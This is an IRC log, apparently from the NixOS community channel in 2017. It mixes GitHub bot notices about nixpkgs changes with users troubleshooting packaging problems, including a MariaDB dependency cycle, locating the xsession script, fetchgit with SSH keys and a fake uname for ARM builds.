<NixOS_GitHub> [nixpkgs] Ericson2314 opened pull request #25225: linux cross stdenv: Pull platforms from lib to cut eval time (master...linux-cross-stdenv-eval) https://git.io/v9YUE
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<NixOS_GitHub> [nixpkgs] Ericson2314 pushed 2 new commits to master: https://git.io/v9YUa
<NixOS_GitHub> nixpkgs/master 78bb5f5 John Ericson: linux cross stdenv: Pull platforms from lib to cut eval time
<NixOS_GitHub> nixpkgs/master 6cb0f0b John Ericson: Merge pull request #25225 from Ericson2314/linux-cross-stdenv-eval...
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<NixOS_GitHub> [nixpkgs] dezgeg pushed 2 new commits to master: https://git.io/v9YTI
<NixOS_GitHub> nixpkgs/master 88be2f7 Kranium Gikos Mendoza: facetimehd: disable aarch64-linux builds
<NixOS_GitHub> nixpkgs/master e57bcc7 Kranium Gikos Mendoza: facetimehd-firmware: disable aarch64-linux builds
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<NixOS_GitHub> [nixpkgs] Ericson2314 opened pull request #25226: glibc: Remove hack around long-fixed bug (staging...glibc-bug-gone) https://git.io/v9Yko
<gchristensen> nice, Sonarpulse
<Sonarpulse> gchristensen: if its a 32-bit only one
<Sonarpulse> can we just merge to master? :D
<gchristensen> mmm not sure
<gchristensen> `NIX_CFLAGS_COMPILE = lib.optionalString`seems `NIX_CFLAGS_COMPILE` would still be set, but to null or empty?
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<Sonarpulse> gchristensen: good point
<Sonarpulse> also woah
<Sonarpulse> that's potentially a big security whole
<gchristensen> oh?
<Sonarpulse> it would be set to ""
<Sonarpulse> which could disable hardening and stuff
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<Sonarpulse> unless that one gets appended
<Sonarpulse> in which case all good
<Sonarpulse> probably just gets appended
<gchristensen> depends, do we do set check or empty check? I think more common is an empty check
<gchristensen> but: good point
<Sonarpulse> yeah
<Sonarpulse> cc-wrapper either unconditionally appends, or does that
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<gchristensen> I've been showing off Nix & NixOS at Percona Live today / this week, people love it
<copumpkin> ooh
<Sonarpulse> Percona Live?
* copumpkin elects gchristensen Nix chief evangelist
<gchristensen> big database conference
<gchristensen> copumpkin: :o ?
<copumpkin> yeah, I can single-handedly elect folks
<gchristensen> :partyparrot:
<Sonarpulse> cool!
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<gchristensen> copumpkin: I've told people about my mysql test infrastructure and I get mostly hear back "you can do that?"
<copumpkin> ooh
<copumpkin> you should give a presentation at nixcon about that
<gchristensen> I'm planning on it, also Percona Live next year
<NixOS_GitHub> [nixpkgs] shlevy pushed 1 new commit to master: https://git.io/v9YI2
<NixOS_GitHub> nixpkgs/master 5aa936d Shea Levy: nix perl-bindings: Fix Config.pm
<copumpkin> cool
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<NixOS_GitHub> [nixpkgs] shlevy pushed 1 new commit to release-17.03: https://git.io/v9YIr
<NixOS_GitHub> nixpkgs/release-17.03 090ffd5 Shea Levy: nix perl-bindings: Fix Config.pm...
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<Ralith> anyone here using the factorio package?
<Ralith> seems broke
<clever> Ralith: somebody was talking to me about mod changes recently
<Ralith> nothing to do with mods
<Ralith> it just fails to log in
<clever> ah
<clever> the whole auth wall code did look pretty ugly
<clever> i just made an override that sets src=
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<Ralith> what's that look like?
<clever> Ralith: joepie91 is doing some other stuff with factorio and may know more
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<Ralith> I can't get any such thing to work
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<Ralith> can you share your override?
<clever> trying to remember where i put it
<clever> its not in my config.nix
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<clever> yeah, its just gone
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<Infinisil> Just wanted to come here to say that firefox finally finished compiling, took 80 minutes with 4 cores
<clever> it was probably just factorio.overrideDerivation (old: { src = /home/clever/downloads/foo.tar.gz; })
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<Ralith> that did it, thanks
<Ralith> was trying to hack the source path into the package directly but it kept spitting out wacky errors
<joepie91> the factorio package, uh, needs work :)
* joepie91 has sorta hacked the source path into the package right now, doesn't like credentials sitting around in nixos config files
<Infinisil> Are all packages being tested on each release?
<joepie91> Infinisil: fairly sure that anything non-free gets skipped at least
<Infinisil> Because I know of one that doesn't even compile
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<joepie91> besides that I think Hydra is responsible for testing builds
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<joepie91> where 'testing' means 'does it compile without errors'
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<Infinisil> That's at least something
<Infinisil> Btw the package I'm talking about is the firefox sync server, running nix-shell --pure -p pythonPackages.syncserver fails to compile the package
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<Ralith> well, I finally rebooted into 17.03, and sddm appears to have confused i3 with a single xterm
<Ralith> anyone have any clue wtf
<Ralith> seems like the release must have a broken xsession script
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<NixOS_GitHub> [nixops] spinus opened pull request #654: #616 Document azure account setup (master...azure-docs) https://git.io/v9YqE
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<Ralith> does anyone have 17.03 working with i3?
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<vaibhavsagar> how do I get more information about *why* a path is not valid?
<spinus> vaibhavsagar: --show-trace and check the code
<Infinisil> @Ralith: I don't, but maybe looking at the source of the display manager helps you: https://github.com/NixOS/nixpkgs/blob/master/nixos/modules/services/x11/display-managers/default.nix
<Infinisil> I'm trying to find this generated file on my system to see what is actually there, but I can't seem to find it
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<Ralith> yeah, seems like the sddm module is just plain broken
<vaibhavsagar> spinus: are you saying I can't get nix-store to tell me what is invalid about a path?
<Ralith> slim works, which is sad because it's abandoned
<vaibhavsagar> in this case there's a dependency cycle
<Infinisil> Slim is abandoned?
<spinus> vaibhavsagar: I'm not saying anything like that
<spinus> vaibhavsagar: do you have example of that path
<spinus> lightdm works as well :-)
<vaibhavsagar> spinus: sorry, just getting a bit frustrated with this thing I'm working on
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<vaibhavsagar> I'm trying to build MariaDB and it's running into a dependency cycle
<vaibhavsagar> I'm told it has to do with multiple build outputs
<Infinisil> No seriously, where can i find the generated xsession, it drives me mad because this ought to be easy
<Infinisil> nixos-option services.xserver.displayManager.session.script gives me a path to xsession, but it doesn't exist
<vaibhavsagar> so I'd like to find the first derivation to change by inspecting the error messages of nix-build
<vaibhavsagar> but it tells me that there's a dependency cycle
<clever> Infinisil: run "nix-store -qR /run/current-system | grep xsession"
<clever> Infinisil: thats the simplest way
<vaibhavsagar> so I tried 'nix-store --query --requisites <path>', but it just tole me the path was invalid
<vaibhavsagar> s/tole/told
<clever> vaibhavsagar: nix wont register a build as valid if it has a dependency cycle
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<clever> vaibhavsagar: but it will leave the failed build in /nix/store, for you to manualy grep
<vaibhavsagar> clever: so I manually grep for '/nix/store/*' paths, and then what?
<clever> vaibhavsagar: when it fails, it will give a .drv path
<clever> vaibhavsagar: checking the first few fields in that .drv will give you the path of each output
<clever> vaibhavsagar: then grep each output for the other output paths
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<clever> and find out what the depdency graph is
<vaibhavsagar> when what fails?
<clever> 2017-04-25 22:24:44 < vaibhavsagar> I'm trying to build MariaDB and it's running into a dependency cycle
<clever> that failure
<spinus> vaibhavsagar: nix-store --query --requisites /nix/store/bla gives me that error, are you sure your "invalid" path exists?
<vaibhavsagar> spinus: yes, it does
<vaibhavsagar> clever: thanks, this is really helpful, but I'm not sure I understand the process
<spinus> can you paste the path here if it's not a secret, maybe we'll catch the issue?
<vaibhavsagar> hmm, it's a custom build of mariadb
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<Infinisil> I got the some path for xsession as before (with nixos-option services.xserver.displayManager.session.script), but the path actually doesn't exist
<vaibhavsagar> I'm trying to upgrade the version of NixOS we use at work and this is what I'm currently stuck on
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<vaibhavsagar> the path is /nix/store/dcg8ap0y8bam23sy6f0mli7306gcjkys-mariadb-client-10.1.21-bin
<clever> that is just the path for one output, we need the paths for all the outputs to find the cycle
<Ralith> Infinisil: see the header on https://wiki.archlinux.org/index.php/SLiM
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<Ralith> slim is dead and it is really unfortunate that it's apparently the only supported display manager on NixOS :/
<clever> Ralith: the logind stuff works fine for me on slim
<Ralith> hurray for you?
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<clever> just saying that its not as broken as the wiki claims
<Ralith> the project is abandoned.
<Ralith> it is not maintained.
<Infinisil> I too am using slim, haven't had a problem with it (it may actually be the only part I *haven't* had a problem with)
<Ralith> if it coincidentally happens to not be obviously broken for your specific use case at the moment, lucky you, but it's not sane to depend on
<Infinisil> Yeah I too get that impression now that I'm looking it up
<spinus> https://github.com/NixOS/nix/issues/481 - looks like mariadb has longer history about those cycles :-)
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<vaibhavsagar> spinus: I found this linked PR: https://github.com/NixOS/nix/pull/925/files
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<vaibhavsagar> so my version of nix should be able to tell me about the cycles?
<vaibhavsagar> actually no, I read it again, this still involves a lot of grepping
<clever> vaibhavsagar: i'm trying to reproduce the issue here, but the build is only 26% done
<vaibhavsagar> I think I have enough to work with, thanks spinus and clever :)
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<vaibhavsagar> clever: don't worry about it, I should have mentioned that build takes forever
<clever> ive got 8 cores and a lot of spare time
<Infinisil> Can someone else tell me if nixos-option services.xserver.displayManager.session.script prints anything other than an error
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<Infinisil> "An error occurred while looking for attribute names." it is for me
<Infinisil> And then a path which doesn't exist
<vaibhavsagar> clever: ah, in that case, let me know if you're able to reproduce it and don't hesitate to abandon if something more interesting comes up
<clever> Infinisil: its usualy faster to find the xsession script in the displaymanager config, after nix-build has finished
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<Infinisil> soooo where do i actually find it?
<clever> Infinisil: which display manager are you using?
<Infinisil> slim
<clever> Infinisil: in /etc/systemd/system/display-manager.service you will find the slim config path
<clever> [clever@amd-nixos:~]$ grep SLIM_CFGFILE /etc/systemd/system/display-manager.service
<clever> Environment="SLIM_CFGFILE=/nix/store/nymy00p3574y1bmwq8xm4bhpdh0a2pkh-slim.cfg"
<clever> [clever@amd-nixos:~]$ grep login_cmd /nix/store/nymy00p3574y1bmwq8xm4bhpdh0a2pkh-slim.cfg
<clever> login_cmd exec /nix/store/hi4j75r312lsjhpdln9p8blyixs59hbs-bash-4.4-p12/bin/bash /nix/store/34gi6pjx7bnhyb4g2qpyiyrc0n1557py-xsession "%session"
<clever> Infinisil: and then in the slim.cfg you will find the session script under login_cmd
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<Infinisil> Still trying.. hold on
<Infinisil> Okay yup I got it, it's the very same one i got before with nixos-option, but it still doesn't exist :
<Infinisil> (
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<Infinisil> okay no
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<Infinisil> I got it, I'm kinda really stupid. I used tab completion on "cd /nix/store", not realizing xsession being a file...
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<clever> i usualy turn tab completion off
<Infinisil> My brain just kinda assumed No extension -> must be directory
<clever> it can do dumb things like that and often just gets in the way
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<Infinisil> May be a good thing, I'll leave it on for now as it's sometimes really useful, especially with the hashy paths in the store
<clever> i mean the smarter tab completion stuff
<clever> i prefer it in the dumb mode, where it can complete files on cd
<clever> then cd just tells you, "x is not a directory" and you instantly know what is wrong
<Infinisil> Hmm, maybe I can just turn this specific feature off..
<clever> i also often do things like mount nas:/nas /na<tab>
<clever> but thats not in the fstab, so it refuses to tab-complete a directory that exists locally
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<NixOS_GitHub> [nixpkgs] copumpkin pushed 1 new commit to master: https://git.io/v9YOW
<NixOS_GitHub> nixpkgs/master 9e764af Dan Peebles: fetchs3: init simple S3 downloader
<Infinisil> WHew, I just thought why not use "find /nix/store/ -name '*xsession'", but this lists like 30 files.. Maybe collecting the garbage would reduce that though
<NixOS_GitHub> [nixpkgs] Ericson2314 opened pull request #25227: Purge binutilsCross (master...cross-purge-binutilsCross) https://git.io/v9YOl
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<clever> Infinisil: GC wont save you,the rollback will keep old copies for easy-undo
<clever> Infinisil: thats why i said to use -qR earlier, "nix-store -qR /run/current-system" will show the subset of the store that the current nixos uses
<clever> Infinisil: then you can grep that for xsession, which will return 1 entry
<clever> vaibhavsagar: its stopped giving progress %'s and appears to now be compiling stuff without cmake
<clever> oh, and theres a random 72%
<Infinisil> Oh that's what nix-store is for, thanks!
<Infinisil> Well one thing it's for anyways
<vaibhavsagar> clever: the % will return eventually
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<clever> yep, up to 83 now
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<turnandrun> so, anyome mind helping out a new guy trying to make a package?
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<clever> vaibhavsagar: 100%
<turnandrun> hello
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<vaibhavsagar> hello turnandrun!
<vaibhavsagar> what do you need help with?
<clever> vaibhavsagar: ok, so $out is /nix/store/j3nn8yznfr1qfnyfm7wdz5yywlpw3bac-mariadb-10.1.21 on my machine
<vaibhavsagar> and no errors?
<clever> its still finishing up
<clever> stripping (with flags -S) in /nix/store/j3nn8yznfr1qfnyfm7wdz5yywlpw3bac-mariadb-10.1.21/lib /nix/store/j3nn8yznfr1qfnyfm7wdz5yywlpw3bac-mariadb-10.1.21/bin
<clever> ah those are still $out
<johnramsden> Can someone give me some help with something related to typelibs?
<turnandrun> I'm trying to make a package based on my gitlab repo and nix-prefetch-git works, but the actual fetchgit doesn't, I get Permisson Denied public key
<clever> turnandrun: fetchgit cant access your ssh keys
<clever> this allows fetchGitPrivate to use your ssh agent
<turnandrun> that one work, i've got nix installed as single user under Ubuntu
<turnandrun> wont* not one
<simpson> turnandrun: Then you don't need to hack the agent socket; you can just point nix-build directly at the actual ssh-agent that you're already running.
<clever> turnandrun: on ubuntu its simpler, just -I ssh-auth-sock=$SSH_AUTH_SOCK -I ssh-config-file=/tmp/ssh-config
<Sonarpulse> anyone wanna review that?
<Sonarpulse> one interesting commit
<Sonarpulse> and one 90% sed commit :D
<Sonarpulse> I want to upstream this stuff before I do a 3 week vacation thursday
* Sonarpulse looks at clever for review duty :D
<clever> vaibhavsagar: the build passed without errors on this end
<clever> vaibhavsagar: what revision of nixpkgs are you using?
<vaibhavsagar> definitely should have mentioned that earlier
<vaibhavsagar> I'm trying to upgrade from 16.03 to 17.03, but instead of doing it in one fell swoop I'm trying to do a bisect so I can fix breakages one at a time
<vaibhavsagar> this sounded like a fantastic idea at the time but it's sounded dumber and dumber every time I describe it
<vaibhavsagar> currently I'm on 4c5fdf42ed3612db4532bc2259dd3f7c6847e077
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<clever> vaibhavsagar: i usualy only bisect nixpkgs when i find something that actualy breaks, and can narrow down a testcase
<vaibhavsagar> yeah, doing it on a whole system was not the best idea
<clever> [clever@amd-nixos:~/apps/nixsap/modules/pkgs/mariadb]$ nix-build -E 'with import /home/clever/apps/nixpkgs {}; callPackage ./. {}'
<clever> vaibhavsagar: build has resumed on that revision
<clever> oh, and i should remove my config.nix
<clever> [clever@amd-nixos:~/apps/nixsap/modules/pkgs/mariadb]$ nix-build -E 'with import /home/clever/apps/nixpkgs { config = {}; }; callPackage ./. {}'
<clever> vaibhavsagar: if you pass a config param to nixpkgs, it will use that, rather then loading config.nix
<clever> so i can isolate the build from my env
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<vaibhavsagar> that makes sense, I think the Makefile I'm using takes care of that
<vaibhavsagar> I've been doing [vaibhavsagar@nixos] NIX_PATH=. nix-build <package>
<vaibhavsagar> the system I'm working on bundles its own nixpkgs as a submodule
<vaibhavsagar> which is why the revision i'm on is the one that works correctly with that setup :)
<nix_niave> Hi nix experts, can you help with this error, i am using nix 17. error says, "gcc: error trying to exec 'as': execvp: No such file or directory"
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<clever> nix_niave: are you using nix-shell?
<nix_niave> hi clever no i was not, i type gcc -o hello hello.c very simple program
<clever> nix_niave: you need to be in a nix-shell for the compiler to work right
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<clever> nix_niave: "nix-shell -p gcc" then try to compile it
<nix_niave> ok, clever, thanks when i use nixshell, i get this error, error: syntax error, unexpected ')', at /home/myname/Desktop/hello2.c:5:7
<clever> nix_niave: can you pastebin the contents of hello2.c?
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<nix_niave> hi clever i am sorry i will learn to pastebin, never did that before feel pretty stupid
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<clever> nix_niave: https://pastebin.com/
<nix_niave> clever sorry i will have to create a pastebin later this is my short code /* this is just a test c code my nix-niave*/ #include<stdio.h> main() { printf("Hello \n"); return ; }
<clever> nix_niave: main needs arguments, and a return value
<clever> int main (int argc, char **argv) {
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<nix_niave> thanks clever, i put (int argc, char **argv) in int main and still get the, error: syntax error, unexpected ',', expecting ')', at /home/myname/Desktop/hello2.c:5:20
<clever> nix_niave: can you try pasting the whole file into a pastebin?
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<nix_niave> hi clever sorry it took so long, i am new at this my paste is called, nix-naive c code in nix-os 17
<clever> i need the url for the paste
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<turnandrun> I'm back, sorry I had to AFK for a bit
<turnandrun> The package worked! Thanks
<nix_niave> ok clever, i got the url now. https://pastebin.com/ygQsX4bL
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<clever> nix_niave: it just works when i compile it
<nix_niave> ok, great clever, the command i use from nix-os is, nix-shell -o hello2 hello2.c
<clever> nix_niave: its "nix-shell -p gcc" then "gcc -o hello2 hello2.c
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<taktoa> I'm kind of genuinely curious how someone who doesn't know how to write/compile hello world in C ended up finding NixOS
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<nix_niave> hi clever, thanks ! for that last line! that did it, how did i miss that in the Nix-Manual, be more thorough next time, have a great night, I have to go to shcool tomorrow. you're my hero!
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<vaibhavsagar> taktoa: I don't know if I could write hello world in C without reference to documentation
<taktoa> #include <stdio.h>\nint main(int argc, char** argv) { printf("hello world"); return 0; }
<taktoa> also vaibhavsagar no one said anything about not having documentation.
<vaibhavsagar> fair enough
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<clever> vaibhavsagar: the build passed again
<clever> lrwxrwxrwx 1 clever users 59 Apr 26 00:10 result -> /nix/store/pfn4rvckp6rfx2mywjyfd3a8bm01bca5-mariadb-10.1.21
<clever> vaibhavsagar: is that the same $out your build is trying to make?
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<vaibhavsagar> clever: I made some changes and now it's failing at mariadb-dev
<clever> vaibhavsagar: can you push those changes to a branch in nixsap?
<vaibhavsagar> path is /nix/store/1x01ridywrbcgr419q2fzk3pr63mjhzv-mariadb-client-10.1.21-dev
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<vaibhavsagar> more background: nixsap is part of a larger system that's not open source
<vaibhavsagar> nixsap uses a newer nixpkgs than we do
<vaibhavsagar> I'm trying to upgrade the larger system
<clever> this derivation produced the following outputs: out -> /nix/store/pfn4rvckp6rfx2mywjyfd3a8bm01bca5-mariadb-10.1.21
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<clever> the nix file you linked only has 1 output on my end
<vaibhavsagar> so far I've been told that the cyclic dependency is not actually in mariadb at all, but in some of our other derivations that reference mysql
<clever> can you pastebin more of the error?
<vaibhavsagar> clever: https://pastebin.com/H1RvNKqK
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<clever> $bin /nix/store/llqvjcz1bg7242sgycs75i18pdq5b6cx-mariadb-client-10.1.21-bin
<clever> $dev /nix/store/1x01ridywrbcgr419q2fzk3pr63mjhzv-mariadb-client-10.1.21-dev
<clever> $out /nix/store/wv8bg5mmm1r78fyjmlw8v2b57fvz6wvf-mariadb-client-10.1.21
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<clever> vaibhavsagar: now do #1 egrep 'llqvjcz1bg7242sgycs75i18pdq5b6cx|1x01ridywrbcgr419q2fzk3pr63mjhzv' /nix/store/wv8bg5mmm1r78fyjmlw8v2b57fvz6wvf-mariadb-client-10.1.21
<clever> vaibhavsagar: #2 egrep 'llqvjcz1bg7242sgycs75i18pdq5b6cx|wv8bg5mmm1r78fyjmlw8v2b57fvz6wvf' /nix/store/1x01ridywrbcgr419q2fzk3pr63mjhzv-mariadb-client-10.1.21-dev
<clever> vaibhavsagar: #3 egrep 1x01ridywrbcgr419q2fzk3pr63mjhzv|wv8bg5mmm1r78fyjmlw8v2b57fvz6wvf' /nix/store/llqvjcz1bg7242sgycs75i18pdq5b6cx-mariadb-client-10.1.21-bin
<hyper_ch> clever: pastebin :)
<clever> vaibhavsagar: oops, and -r on all 3
<clever> hyper_ch: oops, i usualy only use one when pasting multiple lines, dont think about it when i'm typing each
<hyper_ch> you were typing that? oO
<clever> a mix of typing and pasting hashes
<clever> but no \n in the pastes, so i didnt think of it
<hyper_ch> I don't mind :) it's not like there's much going on here currently
<clever> yeah
<hyper_ch> however, otoh, nixos won't rebuild for me on unstable :(
<clever> just somebody trying to compile c by running nix-shell on it
* hyper_ch is a sad panda
<clever> hyper_ch: what error?
<clever> ah
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<hyper_ch> I think perl thingy is failing there
<hyper_ch> but not really sure though
<clever> hyper_ch: i think its a dep of gnucash, so just remove that from your systemPackages
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<hyper_ch> don't really need gnucash anymore though
<hyper_ch> but why did that make you think of gnucash?
<clever> its in the backtrace
<clever> cannot build derivation ‘/nix/store/rmg9l876ff4fz5zbfwr3ss13nmikirrk-gnucash-2.4.15.drv’: 1 dependencies couldn't be built
<hyper_ch> ah
<clever> system-path -> gnucash -> giant mess of perl
<hyper_ch> well, I went back to simple spreadsheet for my accounting :)
<clever> i would expect hydra to filter problems like this out of the channel
<clever> so it must be something special with the user config
<hyper_ch> seems you were right
<hyper_ch> so, it does build the rest.... but I guess vbox will take a long time again
<vaibhavsagar> clever: https://pastebin.com/uGQkvxgW
<hyper_ch> gotta go anyway now
<vaibhavsagar> again, thanks for your help with this :)
<clever> vaibhavsagar: ok, so $out doesnt appear to depend on anything, which is a little weird
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<clever> $dev depends on $out
<clever> $bin depends on $dev and $out
<clever> $dev depends on $bin
<clever> vaibhavsagar: and theres the cycle
<clever> vaibhavsagar: $dev/bin/mysql_config has bindir=$bin/bin
<clever> vaibhavsagar: and $bin/nix-support/propagated-native-build-inputs has $dev directly in it
<clever> nix requires that all dependencies exist before something can be unpacked to /nix/store
<vaibhavsagar> okay, I'm relatively new to nix
<clever> so $dev must be valid to unpack $bin, and $bin must be valid to unpack $dev
<clever> and its now stuck in an imposible situation
<vaibhavsagar> would I be able to remove $bin from the propagated-native-build-inputs?
<clever> a: simplest thing is to just not use multiple outputs, just set outputs = [ "out" ]; and put everything in $out
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<clever> b: the nix file you linked be doesnt use multiple outputs, you either have un-commited changes, or something weird is going on
<vaibhavsagar> this time I took the mariadb/default.nix from 17.03
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<clever> and reading the other pastebin closer, the problem is the mariadb that rsyslog depends on
<vaibhavsagar> yes
<vaibhavsagar> that's exactly right
<clever> try just removing the outputs= from the derivation and see if that helps
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<ozer> I'm trying to override the "blas" argument passed to the nixpkgs numpy derivation with the "blas" package (instead of openblas)
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<ozer> in the toplevel, it's passed openblasCompat in a buildNumpyPackage function
<ozer> and pypkgs.numpy.override { blas = pkgs.blas; } doesn't seem to have any effect
<ozer> can verify numpy chooses openblas by running in python shell:
<ozer> import numpy as np; np.__config__.show()
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<ozer> any idea
<NixOS_GitHub> [nixpkgs] kuznero opened pull request #25230: mono: init at 4.8 (master...mono48) https://git.io/v9Yc4
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<NixOS_GitHub> [nixpkgs] veprbl opened pull request #25231: root: 6.08.02 -> 6.09.02 (master...root_6.09.02) https://git.io/v9YcS
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<NixOS_GitHub> [nixpkgs] Ericson2314 opened pull request #25232: Cross binutils (master...cross-binutils) https://git.io/v9YCK
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<NixOS_GitHub> [nixpkgs] DmitryTsygankov opened pull request #25233: bitcoin-unlimited: -> (master...DmitryTsygankov/bitcoin-unlimited) https://git.io/v9YWo
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<Tipping_Fedora> hi, I need help with my gnome DE, it seems I have lost most of my Icons, is there a fix to this?
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<NixOS_GitHub> [nixpkgs] kuznero opened pull request #25235: mono: init at 5.0 (master...mono5x) https://git.io/v9Y0J
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<NixOS_GitHub> [nixpkgs] matthewbauer opened pull request #25236: nix-bundle: init at 0.1.1 (master...nix-bundle) https://git.io/v9Y01
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<NixOS_GitHub> [nixpkgs] ericsagnes opened pull request #25237: fcitx-engines.mozc: 2.17.2313.102.1 -> 2.18.2612.102.1 and other minor fcitx packages updates (master...pkg-update/fcitx-related) https://git.io/v9YEf
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<dcz> how to issue `make install` in nix-shell?
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<clever> dcz: you cant install programs from a nix-shell, you need to use nix-build to install things
<dcz> clever: thanks, I will look at it
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<NixOS_GitHub> [nixpkgs] vcunat pushed 2 new commits to master: https://git.io/v9YuH
<NixOS_GitHub> nixpkgs/master 0c31837 Lancelot SIX: libidn2: 0.16 -> 2.0.1...
<NixOS_GitHub> nixpkgs/master d7b21c5 Vladimír Čunát: Merge #25171: libidn2: 0.16 -> 2.0.1...
<LnL> you can usually run the installPhase if you set export out=/tmp/foo in a nix-shell
<LnL> but you can't install into the store
<NixOS_GitHub> [nixpkgs] vcunat closed pull request #25171: libidn2: 0.16 -> 2.0.1 (master...update_libidn2) https://git.io/v9ITS
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<dcz> hm, installation to the store is not what I want
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<dcz> I've installed with make install to an arbitrary path, but now LD_LIBRARY_PATH is not set correctly. how to get it from nix? should I use CMAKE_LIBRARY_PATH instead?
<dcz> what I'm trying to do is set up a development environment that people can just enter and have everything work
<clever> if you install it like that, nix wont know the dependencies are in use
<clever> and it can garbage collect them
<dcz> I only intend it to work while entering the derivation
<dcz> actually some paths are correct and some aren't...
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<dcz> http://wklej.org/id/3097379/ - the .so.X files are not there for Qt libs
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<dcz> mistake - they are present
<dcz> just for some reason can't be picked up
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<sphalerite> Do you have any particular reason for not making a proper nix expression that will build the software and install it into the store?
<dcz> sphalerite: yes, I want people to be able to develop it without touching expressions
<dcz> it's supposed to bea one-command dev environment
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<NixOS_GitHub> [nixpkgs] domenkozar closed pull request #25236: nix-bundle: init at 0.1.1 (master...nix-bundle) https://git.io/v9Y01
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<dcz> my host uses nvidia driver for 3D acceleration, is it possible to use hw acceleration in nix apps?
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<the-kenny> if you want a one-command dev environment, create a shell.nix.
<the-kenny> Devs just need to run `nix-shell` in the project's folder to get a reproducible dev environment
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<ZoomZoomZoom> Hey people, what should I do to my pr to be looked at?
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<LnL> ask here :) the repo is pretty active so sometimes stuff gets kind of lost
<jophish> ZoomZoomZoom: The github mention bot should have mentioned some possible reviews. I certainly wouldn't mind being pinged if my name was on that list
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<hoverbear> Hey folks, I'm trying to `pip3 install tockloader` in a `nix-shell '<nixpkgs>' -p python35` and am getting "No module named 'setuptools'" when I run it. Can anyone point me in the right direction? (First time playing with Nix at all)
<exarkun> hoverbear: I don't think you should/can use pip to install python packages on nix
<maikklein> I followed http://stackoverflow.com/a/37231521/944430 and now I get "error: file ‘nixos-config’ was not found in the Nix search path" if I do "sudo nixos-rebuild switch". And it doesn't go away, what should I do?
<hoverbear> exarkun: Well, how am I supposed to install the python module I need to flash my arm board? o.o
<exarkun> hoverbear: you write a nix expression for it
<exarkun> I might be wrong, I haven't used nixos much
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<vaibhavsagar> hoverbear: if you do nix-shell -p python35Packages.pip it'll put you in a shell that will allow you to `pip install tockloader`, but it's a read-only filesystem so you won't be able to successfully install it
<hoverbear> Hmmm okay.
<NixOS_GitHub> [nixpkgs] 7c6f434c closed pull request #25206: Update my pkgs (master...update-my-pkgs) https://git.io/v9qef
<NixOS_GitHub> [nixpkgs] 7c6f434c pushed 8 new commits to master: https://git.io/v9YMo
<NixOS_GitHub> nixpkgs/master c772ecd Matthias Beyer: bean-add: 2017-01-20 -> 2017-04-06
<NixOS_GitHub> nixpkgs/master 3759dc5 Matthias Beyer: cortex: Remove package...
<NixOS_GitHub> nixpkgs/master 12244f5 Matthias Beyer: haxor-news: 0.4.1 -> 0.4.2
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<NixOS_GitHub> [nixpkgs] jyp opened pull request #25239: keras: 1.2.2 -> 2.0.3 (master...keras2) https://git.io/v9YMd
<hoverbear> I guess this is partially complicated by the state of python packaging in general
<LnL> hoverbear: you can use pip install -t site-packages ..., and add that to you PYTHONPATH if you really want to use it
<hoverbear> LnL: Well, I mean, I'd like to do it ~right~, but I'm just trying to figure out what that is. I guess it's editing https://github.com/NixOS/nixpkgs/blob/master/pkgs/development/python-modules/setuptools/default.nix somehow
<LnL> but you'll run into trouble for stuff that needs system dependencies
<LnL> ah not necceceraly
<unlmtd[m]> is there a suckless nixpkgs fork
<hoverbear> LnL: I would like to get https://github.com/helena-project/tockloader working
<LnL> you can write an expression with some custom packages and start a nix-shell with those
<hoverbear> Right
<NixOS_GitHub> [nixpkgs] edolstra pushed 2 new commits to staging: https://git.io/v9YST
<NixOS_GitHub> nixpkgs/staging 8328e3d John Ericson: glibc: Remove hack around long-fixed bug...
<NixOS_GitHub> nixpkgs/staging 7c859a4 Eelco Dolstra: Merge pull request #25226 from Ericson2314/glibc-bug-gone...
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<NixOS_GitHub> [nixpkgs] dezgeg opened pull request #25240: Add a fake uname implementation to stdenv (that returns hardcoded values) (master...pr-fake-uname) https://git.io/v9YQ4
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<NixOS_GitHub> [nixpkgs] dezgeg pushed 1 new commit to staging: https://git.io/v9YQ6
<NixOS_GitHub> nixpkgs/staging 7194179 Tuomas Tynkkynen: bash: Remove unnecessary 'Makefile.inc' that is keeping reference to bootstrap-tools...
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<thineye> hi, how can i check in a pkg build if the grsecurity kernel is used?
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<Dezgeg> clever: jophish: I made a fancy implementation of the `uname -m` fix for ARMs: https://github.com/NixOS/nixpkgs/pull/25240
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<jophish> Dezgeg: I just saw
<jophish> much more fancy than mine
<jophish> Dezgeg: sadly I've discovered that a fake uname isn't enough for some packages
<jophish> the go compiler inparticular
<bennofs> jophish: go compiler uses the uname syscall probably
<Dezgeg> what's that checking? calling the system call directly?
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<jophish> yeah, that's what I assumed
<jophish> I think that this is changed in more recent versions of go
<jophish> but the version used for bootstrapping (1.4) fails to build
<jophish> annoyingly it doesn't build under qemu either
<Dezgeg> heh
<Dezgeg> I thought of something like that but I cringed at the thought of having to recompile the bootstrap tools for that
<jophish> haha, that's just what I did
<Dezgeg> maybe there's other ARM/aarch64 bugs in that qemu version?
<jophish> I think it was an unimplemented system call
<jophish> I didn't investigate very far
<Dezgeg> ok
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<clever> !m Dezgeg
<[0__0]> You're doing good work, Dezgeg!
<sphalerite> unlmtd[m]: I believe there is, based on that whole church of suckless nixos business on the mailing list, but I don't know where it lives or if it's even public at all
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<bennofs> jophish: perhaps you can override the libc `uname` function through LD_PRELOAD?
<bennofs> jophish: but not sure if go even uses libc
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<jophish> bennofs: good idea, I mentioned it on the issue
<jophish> I wonder why there are not arm personalities on linux
<mojjo> does anybody have a glue, why the following does not do: `lib.readFile (runCommand "cmd" {} ''${xorg.xbacklight}/bin/xbacklight -d ':0.0' > $out'')`
<mojjo> I'm getting; RANDR Query Version returned error -1
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<mojjo> btw: is there a shorthand for readfile + runCommand ?
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<bennofs> mojjo: nix builds don't have access to X11 very likely
<sphalerite> ^
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<sphalerite> mojjo: what are you trying to achieve?
<mojjo> It's going to be a service that adjusts the display brightness based on the input of some external device..
<sphalerite> mojjo: what's nix's role in that meant to be?
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<mojjo> it's just that the script in the service does not execute xbacklight properly, which I could narrow down to the above code line..
<mojjo> yeah, but true. it's not nix specific. The question is rather why the systemd service does not exec xbacklight properly...
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<lassulus> maybe $DISPLAY is not set?
<bennofs> mojjo: well but that code runs xbacklight at build time, no? shouldn't you create a service that runs it at runtime?
<mojjo> I tried to set it, but is does not have an effect. actually the -d flag should do the same
<mojjo> bennofs: right, the above code runs it at build time, and in the service it runs at runtime. So it might be a different issue...
<sphalerite> mojjo: what is the point in the nix expression? Do you want it to create a script that will be run by the service?
<sphalerite> If so you probably want to use writeScript and refer to the result of that in the unit config
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<sphalerite> so in the unit, put ExecStart = with pkgs; writeScript "adjust" "${xorg.backlight}/bin/xbacklight -d :0";
<sphalerite> Actually probably needs the shebang as well
